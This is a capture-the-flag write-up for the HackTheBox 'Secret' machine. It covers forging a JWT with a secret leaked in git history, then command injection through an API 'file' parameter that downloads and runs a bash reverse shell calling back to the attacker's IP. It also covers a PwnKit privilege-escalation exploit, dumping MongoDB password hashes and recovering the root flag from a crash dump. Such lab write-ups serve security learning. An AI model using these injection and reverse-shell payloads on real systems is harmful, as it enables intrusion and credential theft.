CTF Secret

CTFHackTheBox

/etc/hosts

1
10.10.11.120 secret.htb

nmap

1
nmap -sV -p- 10.10.11.120

nmap is too slow I will try rust

rustscan

https://github.com/RustScan/RustScan

1
2
3
4
5
6
rustscan -a secret.htb  --range 1-10000

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack

nmap port 3000

1
2
3
4
nmap -sV secret.htb -p 3000

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js (Express middleware)

fuzz

1
2
3
4
5
6
7
ffuf -w Documents/wordlist/directory-list-2.3-medium.txt -u http://secret.htb/FUZZ

docs                    [Status: 200, Size: 20720, Words: 6752, Lines: 487]
api                     [Status: 200, Size: 93, Words: 12, Lines: 1]
Docs                    [Status: 200, Size: 20720, Words: 6752, Lines: 487]
API                     [Status: 200, Size: 93, Words: 12, Lines: 1]
DOCS                    [Status: 200, Size: 20720, Words: 6752, Lines: 487]

node.js api

API

Register

I’m gonna use a plugin to post my requests, you can do it with curl.

Login

I have a token.

Token

This is mu token:

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2Y2U1YzNiMTgxNTA0NjMxOGY5NjAiLCJuYW1lIjoicGVhbnV0IiwiZW1haWwiOiJyb290QHJvb3QuY29tIiwiaWF0IjoxNjQzNTY0NzY2fQ.s-jTYtdx1chd9m2XymrA_tDefcwOciKT8UHNS1H4qHk

I have to decode the second part.

1
2
3
echo "eyJfaWQiOiI2MWY2Y2U1YzNiMTgxNTA0NjMxOGY5NjAiLCJuYW1lIjoicGVhbnV0IiwiZW1haWwiOiJyb290QHJvb3QuY29tIiwiaWF0IjoxNjQzNTY0NzY2fQ" | base64 --decode 

{"_id":"61f6ce5c3b1815046318f960","name":"peanut","email":"[email protected]","iat":1643564766}base64: entrée incorrecte

Maybe I can recreate the payload with
dasith

Download file

http://secret.htb:3000/download/files.zip

See history

https://git-scm.com/book/en/v2/Git-Basics-Viewing-the-Commit-History

1
git log -p -2

-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
+TOKEN_SECRET = secret

And the more important.
href=”https://www.youtube.com/watch?v=dQw4w9WgXcQ">secure! this has everything to make ur project secure.

Create the token

you have to change the name and set the secret in VERIFY SIGNATURE.

Login as admin

… where is my fucking FLag!!!

In the git directory

I have something to do with logs, but I don’t know how to add a parameter.
https://www.codegrepper.com/code-examples/javascript/req+query+params+express
Now I know lol.

Add the parameter.

Exploit

create the payload

rs.sh

1
bash -i >& /dev/tcp/10.10.15.22/4846 0>&1

Listen

1
nc -lvp 4846

Create a http server to download the payload.

1
python2.7 -m SimpleHTTPServer

Download the payload

http://secret.htb:3000/api/logs?file=;wget http://10.10.15.22:8000/rs.sh

Yeah!

Execute the payload

http://secret.htb:3000/api/logs?file=;bash rs.sh

I have a shell as dashith.

Get root

Download the exploit

On my computer

1
wget https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

On the target

1
wget http://10.10.15.22:8000/pol.py

Exploit

1
python3 pol.py

It’s not finish

This exploit is a cheat code, it’s too easy and I want to learn.

Smart enum

1
2
wget http://10.10.15.22:8000/lse.sh 
sh lse.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
 LSE Version: 3.9

        User: dasith
     User ID: 1000
    Password: none
        Home: /home/dasith
        Path: /usr/bin:/bin
       umask: 0022

    Hostname: secret
       Linux: 5.4.0-89-generic
Distribution: Ubuntu 20.04.3 LTS
Architecture: x86_64
============================================================( file system )=====
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/opt/count
/snap/snapd/13640/usr/lib/snapd/snap-confine
/snap/snapd/13170/usr/lib/snapd/snap-confine
---
[*] fst100 Useful binaries................................................. yes!
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
===============================================================( software )=====
[*] sof170 Can we access MongoDB databases without credentials?............ yes!

ps aux

1
ps aux |grep mongo
1
2
3
ps aux |grep mongo
mongodb      863  0.3  1.8 982012 75084 ?        Ssl  19:18   0:06 /usr/bin/mongod --unixSocketPrefix=/run/mongodb --config /etc/mongodb.conf
dasith      9570  0.0  0.0   6432   676 ?        S    19:55   0:00 grep --color=auto mongo

MongoDB

https://stackoverflow.com/questions/24985684/mongodb-show-all-contents-from-all-collections

Nice and short doc, I like it.

1
dasith@secret:~/local-web$ mongo

And list the db.

1
2
3
4
5
6
show dbs

admin     0.000GB
auth-web  0.000GB
config    0.000GB
local     0.000GB

let’s use auth-web.

1
use auth-web

And show the collections, is it la tables?

1
show collections
1
2
3
4
5
6
7
8
9
db.users.find()

{ "_id" : ObjectId("6131bf09c6c27d0b05c16691"), "name" : "theadmin", "email" : "[email protected]", "password" : "$2a$10$SJ8vlQEJYL2J673Xte6BNeMmhHBioLSn6/wqMz2DKjxwQzkModUei", "date" : ISODate("2021-09-03T06:22:01.581Z"), "__v" : 0 }
{ "_id" : ObjectId("6131bfb7c6c27d0b05c16699"), "name" : "user222", "email" : "[email protected]", "password" : "$2a$10$WmuQwihUQkzSrRoYakQdI.5hdjo820LNxSfEYATaBoTa/QXJmEbDS", "date" : ISODate("2021-09-03T06:24:55.832Z"), "__v" : 0 }
{ "_id" : ObjectId("6131d73387dee30378c66556"), "name" : "newuser", "email" : "[email protected]", "password" : "$2a$10$wnvh2al2ABafCszb9oWi/.YIXHX4RrTUiWAIVUlv2Z80lkvmlIUQW", "date" : ISODate("2021-09-03T08:05:07.991Z"), "__v" : 0 }
{ "_id" : ObjectId("613904ae8a27cb040c65de17"), "name" : "dasith", "email" : "[email protected]", "password" : "$2a$10$S/GbYplKgIU4oFdTDsr2SeOJreht3UgIA0MdT7F50EtiBy7ymzFBO", "date" : ISODate("2021-09-08T18:45:02.187Z"), "__v" : 0 }
{ "_id" : ObjectId("61faddebceb4af047698ceff"), "name" : "johnjohn", "email" : "[email protected]", "password" : "$2a$10$u840Z7TxjF0lVjNmkYNQtOfTuQSBfV32i44FZaQ3Cnw3XcxlO5zSe", "date" : ISODate("2022-02-02T19:39:23.759Z"), "__v" : 0 }
{ "_id" : ObjectId("61fae16eceb4af047698cf13"), "name" : "carambar", "email" : "[email protected]", "password" : "$2a$10$4TevfjCfQqSxJhai7njib./hhadYUP7QHbwOEQXJr4O8AW3kWLTc.", "date" : ISODate("2022-02-02T19:54:22.118Z"), "__v" : 0 }
{ "_id" : ObjectId("61fae1eeceb4af047698cf18"), "name" : "carambarcefef", "email" : "[email protected]", "password" : "$2a$10$JSZCh0l9KK1m1fyxfsEFR.sN8adWvt5r.0QHHE52yVdbIceEgGLMy", "date" : ISODate("2022-02-02T19:56:30.893Z"), "__v" : 0 }

Whruyyyyy!!!!!!

Decrypt the password

[email protected] this use is cool.

1
$2a$10$wnvh2al2ABafCszb9oWi/.YIXHX4RrTUiWAIVUlv2Z80lkvmlIUQW

I can’t do it, it’s too hard.

/opt/count

I saw this program with the lse script.
When you run it he ask a file to read and tell you this:

I’m trying to read the root flag.
The program can read it.

Hint

I got the flag from a coredump file.
Someone forgot to remove it.
So I have to kill count.

Spawn 2 shell

One shell with the /opt/count
One shelll to kill it

In /var/crash we have this file: _opt_count.1000.crash

apport-unpack

https://askubuntu.com/questions/434431/how-can-i-read-a-crash-file-from-var-crash

1
2
3
4
5
6
apport-unpack _opt_count.1000.crash /tmp/wruyyyyy
````
  
And then:
```sh
strings /tmp/wr*/Cor*

It’s over, it’s faster with polkit exploit.